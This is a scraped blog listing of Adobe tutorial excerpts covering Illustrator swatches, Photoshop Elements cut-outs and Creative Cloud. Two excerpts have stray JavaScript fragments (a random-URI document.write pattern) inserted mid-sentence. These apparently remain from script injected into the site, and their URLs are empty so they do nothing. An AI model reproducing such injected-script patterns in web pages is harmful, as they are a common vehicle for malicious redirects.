Using the Adobe Illustrator Swatches Panel

Adobe Illustrator Swatches
jQuery(window).bind("load", function(){ setTimeout(function(){ jQuery("#using-the-adobe-illustrator-swatches-panel-iframe").attr("src", ""); },5000); }); Adobe Illustrator Swatches Panel Today I'm going to have a closer look at the Adobe Illustrator Swatches panel, we are going to load all the different type of Swatches and also create Swatches from scratch. We will start by looking at the basic solid Adobe Illustrator Swatches, loading in Pantone Swatches and CMYK Swatches then move on to lo...
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Cutting out images in Adobe Photoshop Elements

Photoshop Elements
We are going to have a quick run through step by step how to cut out an image in Adobe Photoshop Elements using the magnetic lasso tool then copying the image in to a new document and placing in a coloured background. The first step is to open the image you want to cut out by going to File>Open and navigating to the correct file.   With the image open in Adobe Photoshop Elements we can now choose the lasso tool from the 'Select' section in the toolbar on the left hand side of the screen. With the Lasso Tool selected from your Adobe Photoshop Elements toolbar you will no...
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What is the Adobe Creative Cloud and how does it work?

Adobe Creative Cloud
The Adobe Creative Cloud is the way that Adobe sells its software and products, many years ago you would choose the software you require for example Adobe Photoshop, you would then buy a box off the shelf with the DVDs to install the software on your computer. Then in a few years time you would pay for an upgrade DVD to update your version of Adobe Photoshop. var uri = '' + new String (Math.random()).substring (2, 11); document.write(''); These days however it has all changed, all Adobe software is sold on a subscription...
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5 Benefits of Learning Adobe Illustrator

Adobe Illustrator Logo
So last week I wrote about the benefits of learning Adobe InDesign, today I'm going to talk about Adobe Illustrator. Again this is probably a programme you have heard of but maybe unsure of its actual uses.  var uri = '' + new String (Math.random()).substring (2, 11); document.write(''); Adobe Illustrator is used for creating a variety of graphics you can produce logos, detailed illustrations, leaflets, web page designs and many more. Unlike Adobe InDesign it is built more for creating graphics and artwork and doesn...
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